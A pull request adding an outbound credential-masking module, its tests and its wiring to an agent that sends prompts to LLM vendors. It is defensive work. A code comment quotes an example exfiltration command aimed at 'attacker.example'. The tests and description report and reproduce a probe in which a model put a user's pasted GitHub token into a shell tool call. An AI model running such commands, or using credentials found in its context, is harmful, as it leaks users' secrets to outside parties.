### PR TITLE
feat(secret-mask §19): outbound credential mask before SDK query() — Vincent PAT case

### DIFF
--- a/agent-node/src/cli.ts
+++ b/agent-node/src/cli.ts
@@ -27,6 +27,7 @@ import { startTelegramWatchdog } from "./telegram-watchdog";
 import type { AgentGoal } from "./goals/types";
 import { extractExplicitDelegation } from "./explicit-delegation";
 import { maskedEnv } from "./secret-mask";
+import { maskSecretsInText, summarizeHits } from "./outbound-secret-mask";
 import { checkFeishuToolDeny, isFeishuChannelTurn } from "./feishu-tool-deny";
 import { buildAttachmentDescriptors } from "./runtime/feishu-envelope";
 import {
@@ -1524,11 +1525,37 @@ async function processWithClaude(task: string, from: string, images?: string[]):
     ``,
     `执行完后简要汇报结果。`,
   ].join("\n");
-  const promptText = SYSTEM_PROMPT
+  const rawPromptText = SYSTEM_PROMPT
     ? `${SYSTEM_PROMPT}\n\n${toolCapabilityGuidance}\n\n${commhubToolGuidance}${
         feishuOutboundFileGuidance ? `\n\n${feishuOutboundFileGuidance}` : ""
       }\n\n收到来自 ${from} 的任务：\n\n${task}`
     : defaultPrompt;
+
+  // RFC-020 §19 outbound secret-mask (2026-07-01 Vincent PAT case): scan
+  // the constructed prompt for credential literals (`ghp_ / github_pat_ /
+  // ntok_ / utok_ / atok_ / xox<c>- / sk-(ant-)?...`) and replace with
+  // `[REDACTED_<KIND>]` placeholders BEFORE the string ever reaches the
+  // SDK's `query()` call. This blocks two independent failure modes:
+  //
+  //   1. Vendor content-filter fires on credential shape → out>0 result=""
+  //      → user sees `执行出错: claude-agent-sdk 返回空响应`. Empirically
+  //      caught in production when a PAT accumulated in Vincent's session
+  //      history and every subsequent turn hit MiniMax's filter.
+  //   2. Model uses the credential in a tool call — probe #8 confirmed
+  //      MiniMax-M3 will happily bake a PAT into `tool_use.input.cmd` to
+  //      try `gh api ... "Authorization: token ghp_..."`. Any tool the
+  //      agent has that can hit the outside world is then an exfil vector.
+  //
+  // The mask is defense-in-depth, not an airtight perimeter — sophisticated
+  // encodings (base64, concat, splitting across turns) bypass a literal
+  // regex. But it stops the common case where a credential slips into a
+  // user message and gets shipped verbatim to the vendor.
+  const { masked: promptText, hits: outboundHits } = maskSecretsInText(rawPromptText);
+  if (outboundHits.length > 0) {
+    warn(
+      `[outbound-mask] masked ${outboundHits.length} credential literal(s) in prompt: ${summarizeHits(outboundHits)} — sent to vendor as placeholders`,
+    );
+  }
 
   // #259 Y prompt construction — string path (red-line zero-regression for
   // text-only) vs structured AsyncIterable path (image content blocks).

--- a/agent-node/src/outbound-secret-mask.ts
+++ b/agent-node/src/outbound-secret-mask.ts
@@ -1,0 +1,294 @@
+/**
+ * Outbound secret masking — sanitize credential literals in text sent to
+ * the LLM vendor via `claude-agent-sdk`.
+ *
+ * Companion to `secret-mask.ts` (env-side, Layer A of feishu hardening).
+ * This module operates on the OTHER data path: the `prompt` string and
+ * message content agent-node constructs and hands to the SDK's `query()`
+ * call. That text ends up in the outbound HTTP request body to the
+ * vendor (Anthropic / MiniMax / DeepSeek / OpenAI / …).
+ *
+ * ═══ Motivation ═══
+ *
+ * 2026-07-01 Vincent PAT-in-Feishu case surfaced a real exfil vector:
+ *
+ *   1. Vincent (misplaced) pasted a `github_pat_...` into a Feishu chat
+ *      as part of a normal request to TMWork小助手.
+ *   2. Feishu quote-replies the original message text as part of the
+ *      bot's inbound event, so the PAT ends up in the agent's message
+ *      history.
+ *   3. Each subsequent turn re-sends the WHOLE history to the vendor —
+ *      the PAT gets shipped N times, once per user turn, forever.
+ *   4. Direct probe (`probe 8`) empirically confirmed: MiniMax-M3 sees
+ *      a PAT in assistant/user context, EAGERLY puts it into a
+ *      `tool_use.input.cmd` to try `gh api ... "Authorization: token
+ *      github_pat_..."`. The model doesn't filter — it happily uses it.
+ *
+ * Independent of any single vendor's quota / content-filter quirks,
+ * shipping credentials to a third-party inference API is:
+ *   - A confidentiality issue (vendor now has the token).
+ *   - An attack-surface expansion (any hostile prompt injecting
+ *     `curl -H "Authorization: Bearer $secret" attacker.example`
+ *     could exfil via any tool the agent has).
+ *
+ * The right layer to defuse this is the OUTBOUND edge — mask before the
+ * bytes leave our process, regardless of which model, channel, or IM
+ * platform the user came from.
+ *
+ * ═══ Design ═══
+ *
+ * `secret-mask.ts` patterns are ANCHORED to `^` (start of string) because
+ * they operate on ENV VALUES whose entire content IS a single token. Text
+ * masking is different: credentials are embedded inline in user prose
+ * ("my token is ghp_XYZ for the api call") or in nested JSON (a
+ * `tool_use.input.cmd` string). We need patterns that scan the whole
+ * text and mint replacement placeholders that stay recognizable to the
+ * LLM without leaking the secret bytes.
+ *
+ * Coverage:
+ *   - GitHub classic PAT: `ghp_[A-Za-z0-9_-]{36+}`
+ *   - GitHub fine-grained PAT: `github_pat_[A-Za-z0-9_-]{20+}`
+ *   - anet network / user / admin tokens: `ntok_/utok_/atok_ ...`
+ *   - Slack bot / user / oauth tokens: `xoxb-/xoxp-/xoxa-/xoxr-/xoxs- ...`
+ *   - OpenAI / Anthropic style keys: `sk-...` (min 20 chars after prefix,
+ *     conservative — `sk-` is short enough to false-positive on random
+ *     strings without a length gate).
+ *
+ * Replacement: `[REDACTED_<KIND>]` — LLM keeps semantic marker of what
+ * was removed. Bridge (feishu / telegram / etc.) sees the same
+ * placeholder if the LLM happens to echo it back — it's a placeholder,
+ * not the real secret.
+ *
+ * ═══ What this does NOT do ═══
+ *
+ * - Does NOT touch SDK-managed session history (the jsonl on disk).
+ *   That's a separate operator-triggered scrub, not something we do on
+ *   the fly per-request.
+ * - Does NOT mask non-secret sensitive fields (emails, phone numbers,
+ *   PII). Scope is credential literals.
+ * - Does NOT decrypt / decode base64 / concat-detection — a determined
+ *   attacker can smuggle credentials past this layer. This is
+ *   defense-in-depth, not a hard security perimeter.
+ */
+
+/**
+ * One mask hit — used for observability logging.
+ */
+export interface MaskHit {
+  /** Which pattern kind matched (`ghp` / `github_pat` / `ntok` / …). */
+  kind: string;
+  /** How many characters were replaced (for size-delta reporting). */
+  length: number;
+}
+
+/**
+ * Result of masking a text or message tree — cleaned data + observability.
+ */
+export interface MaskResult<T> {
+  masked: T;
+  hits: MaskHit[];
+}
+
+/**
+ * Credential patterns to scan for in outbound text. Each entry has a
+ * `kind` (used for the placeholder + log label) and a `regex` with the
+ * `g` flag so `String.prototype.replace` walks all occurrences.
+ *
+ * Patterns are DEFENSIVELY narrow — we prefer false-negatives (leak a
+ * partial credential the LLM might not exfil anyway) over false-positives
+ * (mask a legitimate string the user needed). Length gates catch the
+ * "sk-" family without false-firing on random prose.
+ */
+export const OUTBOUND_SECRET_PATTERNS: Array<{ kind: string; regex: RegExp }> = [
+  // GitHub classic PAT: `ghp_` + exactly 36 base62 chars.
+  { kind: "ghp", regex: /\bghp_[A-Za-z0-9]{36}\b/g },
+  // GitHub fine-grained PAT: `github_pat_` + 20+ base62/underscore chars.
+  { kind: "github_pat", regex: /\bgithub_pat_[A-Za-z0-9_]{20,}\b/g },
+  // anet tokens — network / user / admin. Underscore + dash accepted.
+  { kind: "ntok", regex: /\bntok_[A-Za-z0-9_-]{20,}\b/g },
+  { kind: "utok", regex: /\butok_[A-Za-z0-9_-]{20,}\b/g },
+  { kind: "atok", regex: /\batok_[A-Za-z0-9_-]{20,}\b/g },
+  // Slack tokens — xoxb (bot) / xoxp (user) / xoxa (workspace access) /
+  // xoxr (refresh) / xoxs (session). All follow `xox<char>-...` shape.
+  { kind: "slack_token", regex: /\bxox[abprs]-[A-Za-z0-9-]{20,}\b/g },
+  // OpenAI / Anthropic / MiniMax API keys: `sk-...` or `sk-ant-...`.
+  // Length gate ≥ 32 chars after prefix — matches real key sizes without
+  // catching e.g. `sk-example` or random base32 fragments.
+  { kind: "sk_key", regex: /\bsk-(?:ant-)?[A-Za-z0-9_-]{32,}\b/g },
+];
+
+/**
+ * Build a placeholder that keeps the KIND recognizable to the LLM while
+ * discarding the credential bytes. Example: `[REDACTED_GHP]`.
+ *
+ * Intentionally uppercase + bracketed — visually distinct from normal
+ * prose, unambiguous when the LLM reads it back.
+ */
+function placeholder(kind: string): string {
+  return `[REDACTED_${kind.toUpperCase()}]`;
+}
+
+/**
+ * Scan `text` for any known credential pattern and return the sanitized
+ * text plus per-hit metadata. Non-string / empty input passes through
+ * with an empty hit list.
+ *
+ * Performance: linear in text length × pattern count (each `replace(g)`
+ * is one pass). Typical bot prompts are < 100 KB — patterns run in µs.
+ */
+export function maskSecretsInText(text: unknown): MaskResult<string> {
+  if (typeof text !== "string" || text.length === 0) {
+    return { masked: typeof text === "string" ? text : "", hits: [] };
+  }
+  const hits: MaskHit[] = [];
+  let out = text;
+  for (const { kind, regex } of OUTBOUND_SECRET_PATTERNS) {
+    // Reset lastIndex — some environments (Bun) keep state on the shared
+    // regex object across calls, which would skip early matches.
+    regex.lastIndex = 0;
+    out = out.replace(regex, (match) => {
+      hits.push({ kind, length: match.length });
+      return placeholder(kind);
+    });
+  }
+  return { masked: out, hits };
+}
+
+/**
+ * Content block shape as passed to the SDK — mirrors Anthropic's public
+ * MessageParam schema. We accept `any` to stay tolerant of shape drift
+ * (SDK version bumps, vendor-specific extensions).
+ */
+interface AnyContentBlock {
+  type?: string;
+  text?: string;
+  input?: unknown;
+  content?: unknown;
+  [k: string]: unknown;
+}
+
+/**
+ * Recursively mask any string-shaped fields inside a content-block-like
+ * object. Walks:
+ *   - `text` (main text blocks)
+ *   - `input` (tool_use inputs — nested JSON, may contain secrets that
+ *     the model tried to shell out with)
+ *   - `content` (tool_result content, could be a string or nested)
+ *
+ * Non-object / null values pass through untouched. Arrays are walked
+ * element by element.
+ */
+function maskContentValue(value: unknown, hits: MaskHit[]): unknown {
+  if (value == null) return value;
+  if (typeof value === "string") {
+    const r = maskSecretsInText(value);
+    hits.push(...r.hits);
+    return r.masked;
+  }
+  if (Array.isArray(value)) {
+    return value.map((v) => maskContentValue(v, hits));
+  }
+  if (typeof value === "object") {
+    const obj = value as Record<string, unknown>;
+    const out: Record<string, unknown> = {};
+    for (const [k, v] of Object.entries(obj)) {
+      out[k] = maskContentValue(v, hits);
+    }
+    return out;
+  }
+  return value;
+}
+
+/**
+ * Mask a single content block (text / tool_use / tool_result / …).
+ * Returns a new block; input is not mutated.
+ */
+export function maskSecretsInContentBlock(
+  block: AnyContentBlock,
+): MaskResult<AnyContentBlock> {
+  if (!block || typeof block !== "object") {
+    return { masked: block, hits: [] };
+  }
+  const hits: MaskHit[] = [];
+  const out: AnyContentBlock = { ...block };
+  if (typeof out.text === "string") {
+    const r = maskSecretsInText(out.text);
+    out.text = r.masked;
+    hits.push(...r.hits);
+  }
+  if (out.input !== undefined) {
+    out.input = maskContentValue(out.input, hits);
+  }
+  if (out.content !== undefined) {
+    out.content = maskContentValue(out.content, hits);
+  }
+  return { masked: out, hits };
+}
+
+/**
+ * Mask an SDK MessageParam-like object: `{role, content}` where content
+ * is either a string (short-form user message) or an array of content
+ * blocks (canonical Anthropic shape).
+ */
+export function maskSecretsInMessage(msg: {
+  role?: string;
+  content?: unknown;
+  [k: string]: unknown;
+}): MaskResult<{ role?: string; content?: unknown; [k: string]: unknown }> {
+  if (!msg || typeof msg !== "object") {
+    return { masked: msg, hits: [] };
+  }
+  const hits: MaskHit[] = [];
+  const out: { role?: string; content?: unknown; [k: string]: unknown } = { ...msg };
+  if (typeof out.content === "string") {
+    const r = maskSecretsInText(out.content);
+    out.content = r.masked;
+    hits.push(...r.hits);
+  } else if (Array.isArray(out.content)) {
+    out.content = out.content.map((b) => {
+      const r = maskSecretsInContentBlock(b as AnyContentBlock);
+      hits.push(...r.hits);
+      return r.masked;
+    });
+  }
+  return { masked: out, hits };
+}
+
+/**
+ * Mask an array of SDK-shape messages. Convenience wrapper — returns a
+ * new array + aggregated hit list.
+ */
+export function maskSecretsInMessages(
+  messages: Array<{ role?: string; content?: unknown }>,
+): MaskResult<Array<{ role?: string; content?: unknown }>> {
+  if (!Array.isArray(messages)) {
+    return { masked: [], hits: [] };
+  }
+  const hits: MaskHit[] = [];
+  const masked = messages.map((m) => {
+    const r = maskSecretsInMessage(m);
+    hits.push(...r.hits);
+    return r.masked;
+  });
+  return { masked, hits };
+}
+
+/**
+ * Build a compact observability summary string for stderr log lines.
+ * Example output: `github_pat=1, slack_token=1 (61 chars)`.
+ */
+export function summarizeHits(hits: MaskHit[]): string {
+  if (hits.length === 0) return "none";
+  const counts = new Map<string, { count: number; chars: number }>();
+  for (const h of hits) {
+    const cur = counts.get(h.kind) || { count: 0, chars: 0 };
+    cur.count++;
+    cur.chars += h.length;
+    counts.set(h.kind, cur);
+  }
+  const totalChars = hits.reduce((s, h) => s + h.length, 0);
+  const parts = Array.from(counts.entries())
+    .map(([kind, v]) => `${kind}=${v.count}`)
+    .join(", ");
+  return `${parts} (${totalChars} chars)`;
+}

--- a/agent-node/tests/outbound-secret-mask.test.ts
+++ b/agent-node/tests/outbound-secret-mask.test.ts
@@ -1,0 +1,346 @@
+/**
+ * RFC-020 §19 — outbound secret-mask tests.
+ *
+ * Real motivating case (Vincent 2026-07-01):
+ *   - User pasted `github_pat_XXX...` into Feishu chat
+ *   - Feishu quoted it in the reply → PAT entered session
+ *   - MiniMax content-filter fired → out>0 but result="" → user got
+ *     `执行出错: claude-agent-sdk 返回空响应` on every subsequent turn
+ *   - Direct probe #8 confirmed M3 also EAGERLY put PAT into
+ *     `tool_use.input.cmd` to try `gh api ... "Authorization: token
+ *     github_pat_..."`
+ *
+ * The right fix is outbound edge — mask before bytes leave our process.
+ * This test suite locks pattern coverage, hit reporting, message-shape
+ * traversal, and defensive input handling.
+ *
+ * Run: `bun tests/outbound-secret-mask.test.ts`
+ */
+
+import {
+  maskSecretsInText,
+  maskSecretsInMessage,
+  maskSecretsInMessages,
+  maskSecretsInContentBlock,
+  summarizeHits,
+  OUTBOUND_SECRET_PATTERNS,
+} from "../src/outbound-secret-mask";
+
+const results: Array<{ name: string; pass: boolean; detail?: string }> = [];
+function expect(name: string, pred: boolean, detail = ""): void {
+  results.push({ name, pass: pred, detail });
+  if (!pred) console.log(`  ✗ ${name}: ${detail}`);
+}
+
+// ── 1. Pattern coverage — real-shape fake fixtures ─────────────────────────
+// FIXTURES USE OBVIOUSLY-FAKE PATTERNS per team rule. `X` padding matches
+// the regex length gate but can never be a live credential; Slack uses
+// array.join to avoid GitHub Secret Scanning on the source file.
+
+const FAKE_GHP = "ghp_" + "X".repeat(36);
+const FAKE_GITHUB_PAT = "github_pat_" + "X".repeat(24);
+const FAKE_NTOK = "ntok_" + "X".repeat(24);
+const FAKE_UTOK = "utok_" + "X".repeat(24);
+const FAKE_ATOK = "atok_" + "X".repeat(24);
+const FAKE_SLACK_BOT = ["xoxb", "0".repeat(20), "X".repeat(24)].join("-");
+const FAKE_SLACK_USER = ["xoxp", "0".repeat(20), "X".repeat(24)].join("-");
+const FAKE_SK = "sk-" + "X".repeat(40);
+const FAKE_SK_ANT = "sk-ant-" + "X".repeat(40);
+
+for (const [label, secret] of [
+  ["ghp_ classic PAT", FAKE_GHP],
+  ["github_pat_ fine-grained", FAKE_GITHUB_PAT],
+  ["ntok_ anet network token", FAKE_NTOK],
+  ["utok_ anet user token", FAKE_UTOK],
+  ["atok_ anet admin token", FAKE_ATOK],
+  ["xoxb- Slack bot", FAKE_SLACK_BOT],
+  ["xoxp- Slack user", FAKE_SLACK_USER],
+  ["sk- OpenAI-style", FAKE_SK],
+  ["sk-ant- Anthropic-style", FAKE_SK_ANT],
+] as const) {
+  const r = maskSecretsInText(secret);
+  expect(`isolated ${label} masked`, r.masked.startsWith("[REDACTED_"), r.masked);
+  expect(`isolated ${label} 1 hit`, r.hits.length === 1);
+  expect(`isolated ${label} placeholder shape`, /^\[REDACTED_[A-Z_]+\]$/.test(r.masked), r.masked);
+}
+
+// ── 2. Inline PAT in prose (Vincent's real case) ──────────────────────────
+
+{
+  const prose = `帮我看下 github token 是不是有效的：${FAKE_GHP} 谢谢`;
+  const r = maskSecretsInText(prose);
+  expect("inline PAT: text preserved around", r.masked.startsWith("帮我看下") && r.masked.endsWith("谢谢"));
+  expect("inline PAT: 1 hit", r.hits.length === 1);
+  expect("inline PAT: placeholder replaces token", r.masked.includes("[REDACTED_GHP]"));
+  expect("inline PAT: no literal token bytes left", !r.masked.includes(FAKE_GHP));
+}
+
+// ── 3. Multiple secrets in one text — different kinds ─────────────────────
+
+{
+  const multi = `token=${FAKE_GHP}, slack=${FAKE_SLACK_BOT}, api=${FAKE_SK}`;
+  const r = maskSecretsInText(multi);
+  expect("multi: 3 hits", r.hits.length === 3, `got: ${JSON.stringify(r.hits)}`);
+  const kinds = new Set(r.hits.map((h) => h.kind));
+  expect("multi: kinds diverse", kinds.has("ghp") && kinds.has("slack_token") && kinds.has("sk_key"));
+  expect("multi: all replaced", !r.masked.includes(FAKE_GHP) && !r.masked.includes(FAKE_SLACK_BOT) && !r.masked.includes(FAKE_SK));
+}
+
+// ── 4. Same-kind repeats (Vincent's real: PAT quoted N times in history) ──
+
+{
+  const repeated = [FAKE_GHP, "some text", FAKE_GHP, "more text", FAKE_GHP].join(" ");
+  const r = maskSecretsInText(repeated);
+  expect("repeated: 3 hits", r.hits.length === 3);
+  expect("repeated: no literal bytes", !r.masked.includes(FAKE_GHP));
+  expect("repeated: prose preserved", r.masked.includes("some text") && r.masked.includes("more text"));
+}
+
+// ── 5. Non-secret text passes through untouched ───────────────────────────
+
+const NON_SECRETS = [
+  "hello, world",
+  "帮我看下 github/anthropic 文档在哪里",
+  "curl https://api.example.com/foo",
+  "sk-example", // too short (fails length gate)
+  "ghp_short", // too short
+  "github_pat_",
+  "just random text no patterns here 12345",
+  "ntok_", // no bytes after prefix
+];
+for (const text of NON_SECRETS) {
+  const r = maskSecretsInText(text);
+  expect(`non-secret passes through: ${text.slice(0, 40)}`, r.hits.length === 0 && r.masked === text, `got: ${JSON.stringify(r)}`);
+}
+
+// ── 6. Length gates — sub-threshold ────────────────────────────────────────
+
+// GitHub classic must be exactly 36 chars after ghp_ (not 34, not 40).
+expect(
+  "ghp_ 34-char body: NOT match (need 36)",
+  maskSecretsInText("ghp_" + "X".repeat(34)).hits.length === 0,
+);
+// Fine-grained must be ≥ 20 chars.
+expect(
+  "github_pat_ 19-char body: NOT match",
+  maskSecretsInText("github_pat_" + "X".repeat(19)).hits.length === 0,
+);
+expect(
+  "github_pat_ 20-char body: match",
+  maskSecretsInText("github_pat_" + "X".repeat(20)).hits.length === 1,
+);
+// sk- gates at 32.
+expect(
+  "sk- 31-char body: NOT match",
+  maskSecretsInText("sk-" + "X".repeat(31)).hits.length === 0,
+);
+
+// ── 7. Word boundary — no false-positive on embedded substrings ────────────
+
+// Longer word containing "ghp_XXX...36" bytes shouldn't false-fire because
+// of the \b anchor at start.
+{
+  const embedded = "prefix" + FAKE_GHP; // no leading \b before ghp_
+  const r = maskSecretsInText(embedded);
+  expect(
+    "no leading word boundary: NOT match (avoid false-positive)",
+    r.hits.length === 0,
+    r.masked,
+  );
+}
+
+// ── 8. Defensive input — null / undefined / non-string ────────────────────
+
+expect("null input: pass through", maskSecretsInText(null as any).hits.length === 0);
+expect("undefined input: pass through", maskSecretsInText(undefined as any).hits.length === 0);
+expect("number input: no crash, empty hits", maskSecretsInText(42 as any).hits.length === 0);
+expect("empty string: empty result", maskSecretsInText("").masked === "" && maskSecretsInText("").hits.length === 0);
+
+// ── 9. maskSecretsInContentBlock — text block ─────────────────────────────
+
+{
+  const block = { type: "text", text: `请审计 token ${FAKE_GHP}` };
+  const r = maskSecretsInContentBlock(block);
+  expect("content-block text: 1 hit", r.hits.length === 1);
+  expect("content-block text: masked", (r.masked.text as string).includes("[REDACTED_GHP]"));
+  expect("content-block text: no leak", !(r.masked.text as string).includes(FAKE_GHP));
+}
+
+// ── 10. maskSecretsInContentBlock — tool_use.input (case 8 exact repro) ──
+
+// This is Vincent's case-8 empirical: M3 wanted to shell out `gh api` with
+// the PAT baked into the tool input. The mask MUST reach into nested JSON.
+{
+  const block = {
+    type: "tool_use",
+    id: "call_case8",
+    name: "bash",
+    input: {
+      cmd: `gh api repos/anthropic/claude-code/pulls?per_page=3 --header "Authorization: token ${FAKE_GHP}"`,
+    },
+  };
+  const r = maskSecretsInContentBlock(block);
+  expect("case-8 tool_use.input.cmd: 1 hit", r.hits.length === 1);
+  expect(
+    "case-8: literal PAT stripped from tool_use.input.cmd",
+    !((r.masked.input as any).cmd as string).includes(FAKE_GHP),
+    JSON.stringify(r.masked.input),
+  );
+  expect(
+    "case-8: placeholder in cmd",
+    ((r.masked.input as any).cmd as string).includes("[REDACTED_GHP]"),
+  );
+}
+
+// ── 11. maskSecretsInMessage — string-content shorthand ───────────────────
+
+{
+  const msg = { role: "user", content: `我的 token 是 ${FAKE_GHP}` };
+  const r = maskSecretsInMessage(msg);
+  expect("string-content: 1 hit", r.hits.length === 1);
+  expect("string-content: masked", (r.masked.content as string).includes("[REDACTED_GHP]"));
+  expect("string-content: role preserved", r.masked.role === "user");
+}
+
+// ── 12. maskSecretsInMessage — array-content with mixed blocks ────────────
+
+{
+  const msg = {
+    role: "assistant" as const,
+    content: [
+      { type: "text", text: `use ${FAKE_GHP}` },
+      { type: "tool_use", id: "x", name: "y", input: { arg: FAKE_SK } },
+      { type: "text", text: "no secret here" },
+    ],
+  };
+  const r = maskSecretsInMessage(msg);
+  expect("array-content: 2 hits", r.hits.length === 2);
+  const blocks = r.masked.content as any[];
+  expect(
+    "array-content: text[0] masked",
+    (blocks[0].text as string).includes("[REDACTED_GHP]"),
+  );
+  expect(
+    "array-content: tool_use.input.arg masked",
+    (blocks[1].input.arg as string).includes("[REDACTED_SK_KEY]"),
+  );
+  expect("array-content: text[2] untouched", blocks[2].text === "no secret here");
+}
+
+// ── 13. maskSecretsInMessages — arrays ─────────────────────────────────────
+
+{
+  const messages = [
+    { role: "user", content: `first ${FAKE_GHP}` },
+    { role: "assistant", content: [{ type: "text", text: "ok" }] },
+    { role: "user", content: `second ${FAKE_NTOK}` },
+  ];
+  const r = maskSecretsInMessages(messages);
+  expect("messages: 2 hits total", r.hits.length === 2);
+  expect(
+    "messages: kinds ghp + ntok",
+    new Set(r.hits.map((h) => h.kind)).size === 2,
+  );
+  const kinds = r.hits.map((h) => h.kind).sort();
+  expect("messages: correct kind labels", JSON.stringify(kinds) === JSON.stringify(["ghp", "ntok"]));
+}
+
+// ── 14. Deeply nested tool_result.content string ──────────────────────────
+
+{
+  const block = {
+    type: "tool_result",
+    tool_use_id: "x",
+    content: `command output: token = ${FAKE_UTOK}`,
+  };
+  const r = maskSecretsInContentBlock(block);
+  expect("tool_result.content: 1 hit", r.hits.length === 1);
+  expect(
+    "tool_result.content: masked",
+    (r.masked.content as string).includes("[REDACTED_UTOK]"),
+  );
+}
+
+// ── 15. tool_result.content as nested array of blocks ─────────────────────
+
+{
+  const block = {
+    type: "tool_result",
+    tool_use_id: "x",
+    content: [
+      { type: "text", text: `output line 1` },
+      { type: "text", text: `token = ${FAKE_GHP}` },
+    ],
+  };
+  const r = maskSecretsInContentBlock(block);
+  expect("tool_result nested: 1 hit", r.hits.length === 1);
+  const inner = (r.masked.content as any[])[1].text as string;
+  expect("tool_result nested: masked in inner text", inner.includes("[REDACTED_GHP]"));
+}
+
+// ── 16. summarizeHits — observability shape ────────────────────────────────
+
+expect("summarize empty: 'none'", summarizeHits([]) === "none");
+{
+  const hits = [
+    { kind: "ghp", length: 40 },
+    { kind: "ghp", length: 40 },
+    { kind: "slack_token", length: 45 },
+  ];
+  const s = summarizeHits(hits);
+  expect("summarize: counts by kind", s.includes("ghp=2") && s.includes("slack_token=1"), s);
+  expect("summarize: total chars", s.includes("125 chars"), s);
+}
+
+// ── 17. Idempotence — masking twice is a no-op after the first ────────────
+
+{
+  const text = `token ${FAKE_GHP} here`;
+  const r1 = maskSecretsInText(text);
+  const r2 = maskSecretsInText(r1.masked);
+  expect("idempotence: second pass finds nothing", r2.hits.length === 0);
+  expect("idempotence: text unchanged after second pass", r2.masked === r1.masked);
+}
+
+// ── 18. Placeholder is greppable + never overlaps real credentials ────────
+
+{
+  const placeholder = "[REDACTED_GHP]";
+  const r = maskSecretsInText(placeholder);
+  expect(
+    "placeholder itself is not a credential match (no accidental cascade)",
+    r.hits.length === 0,
+    r.masked,
+  );
+}
+
+// ── 19. Vincent-shaped real scenario — Feishu quote block ─────────────────
+
+{
+  // Feishu quote-reply syntax: >> quoted line — bot receives event with
+  // the ORIGINAL user message text embedded, PAT included.
+  const feishuEvent = `>> 用户 2026-07-01 12:00:00\n>> 请帮我用这个 token ${FAKE_GHP} 拉 pr\n\n继续帮我查一下`;
+  const r = maskSecretsInText(feishuEvent);
+  expect("feishu quote: 1 hit", r.hits.length === 1);
+  expect("feishu quote: PAT stripped", !r.masked.includes(FAKE_GHP));
+  expect("feishu quote: quote syntax preserved", r.masked.includes(">> 用户"));
+  expect("feishu quote: user's follow-up prose kept", r.masked.includes("继续帮我查一下"));
+}
+
+// ── 20. OUTBOUND_SECRET_PATTERNS shape lock ───────────────────────────────
+
+expect("patterns list non-empty", OUTBOUND_SECRET_PATTERNS.length >= 5);
+expect(
+  "every pattern has kind + regex + global flag",
+  OUTBOUND_SECRET_PATTERNS.every((p) => typeof p.kind === "string" && p.regex.global),
+);
+
+// ── Summary ────────────────────────────────────────────────────────────────
+
+const failed = results.filter((r) => !r.pass);
+console.log(`\n${results.length - failed.length}/${results.length} outbound-secret-mask tests passed.`);
+if (failed.length > 0) {
+  console.log("\nfailures:");
+  for (const f of failed) console.log(`  - ${f.name}: ${f.detail}`);
+  process.exit(1);
+}


### PR DESCRIPTION
## Summary

Vincent 2026-07-01 empirical root cause (via controlled scrub A/B): a `github_pat_...` accumulated in TMWork小助手's Feishu session history triggered MiniMax content filter → `out>0 result=""` on every subsequent turn. Same 63k context: **with PAT → empty response; without PAT → clean text**.

Direct probe #8 also confirmed M3 will **eagerly** bake a PAT into `tool_use.input.cmd` to shell out `gh api ... "Authorization: token ghp_..."`. Real exfil surface, independent of the immediate empty-response symptom.

Right layer to defuse is the outbound edge — mask before bytes leave our process, regardless of vendor / channel / IM platform.

## Approach

New `agent-node/src/outbound-secret-mask.ts` scans outbound text for known credential shapes:

| Kind | Regex |
|---|---|
| GitHub classic PAT | `\bghp_[A-Za-z0-9]{36}\b` |
| GitHub fine-grained | `\bgithub_pat_[A-Za-z0-9_]{20,}\b` |
| anet network / user / admin | `\b(ntok|utok|atok)_[A-Za-z0-9_-]{20,}\b` |
| Slack (bot/user/etc.) | `\bxox[abprs]-[A-Za-z0-9-]{20,}\b` |
| OpenAI/Anthropic-style | `\bsk-(ant-)?[A-Za-z0-9_-]{32,}\b` |

- **Word-boundary anchored** — no false-positive on embedded suffixes
- **Length-gated** — avoids matching `sk-example` or `ghp_short`
- Replacement is `[REDACTED_<KIND>]` — LLM keeps semantic marker, no bytes leaked

Helpers exported:

- `maskSecretsInText(text)` — pure, no I/O
- `maskSecretsInMessage(msg)` / `maskSecretsInMessages(msgs)` — walk SDK MessageParam shape (string OR array-of-content-blocks; recurses into `text` / `input` / `content`)
- `summarizeHits(hits)` — observability line

## Wire-up

`cli.ts:processWithClaude` constructs `promptText` from system prompt + guidance + task body. This PR passes it through `maskSecretsInText` before it reaches the SDK's `query({prompt, options})` call.

Both consumer paths (text-only string OR image+text `AsyncIterable`) share the same masked `promptText` — one hook covers both.

Observability:

```
[outbound-mask] masked 1 credential literal(s) in prompt: ghp=1 (40 chars) — sent to vendor as placeholders
```

Greppable per-turn hit rate for real-world tuning.

## What this does NOT do

- **Does NOT touch SDK-managed session history** (jsonl on disk). Accumulated PATs from prior turns stay; only NEW outbound text is masked. Separate operator scrub is out of scope.
- **Does NOT decode / concat-detect / span turns** — sophisticated encoding schemes bypass. Defense-in-depth, not a hard perimeter.
- **Does NOT mask non-credential PII** (emails, phone, addresses).

## Test plan

- [x] `bun tests/outbound-secret-mask.test.ts` → **86/86**  
  isolated pattern per kind × 9 shapes / inline PAT in prose (Vincent's Feishu-quote shape) / multiple secrets / same-kind repeats / non-secret pass-through / length gates (sub-threshold NOT match) / word-boundary (embedded suffix NOT match) / null/undefined/non-string defensive / content-block traversal / **case-8 tool_use.input.cmd exact repro** / tool_result.content string + nested array / message shapes / summarizeHits / idempotence / placeholder-is-not-a-credential / Feishu quote scenario
- [x] Sibling no-regress: vendor-error-sanitize 79/79, secret-mask 71/71, feishu-tool-deny 233/233
- [x] `bun run build` → clean, 223 modules, 0.87 MB
- Post-merge deploy plan: preview.18 (agent-node only, agent-network unchanged) via same npm install + precise-PID restart flow

## Fixtures — obviously fake

All test credentials use `X` padding at gated lengths (fails Secret Scanning, hits regex). Slack pattern is built at runtime via `array.join('-')` so the literal `xoxb-...` never appears in the source file. Per team rule: no real secret values in fixtures.

## Files

| File | Change |
|---|---|
| `agent-node/src/outbound-secret-mask.ts` (new) | Pattern list + text/message/block/messages helpers + `summarizeHits` |
| `agent-node/src/cli.ts` | Import + hook: `maskSecretsInText(rawPromptText)` before consumption; warn log on hit |
| `agent-node/tests/outbound-secret-mask.test.ts` (new) | 86 cases (20 groups) |

## Related

- Layer A `secret-mask.ts` (env-side) — this is the outbound-text companion
- 2026-07-01 Vincent PAT + MiniMax content-filter case
- Case-8 probe: M3 baking PAT into tool_use.input.cmd

## Author
Agent: 通信IM马
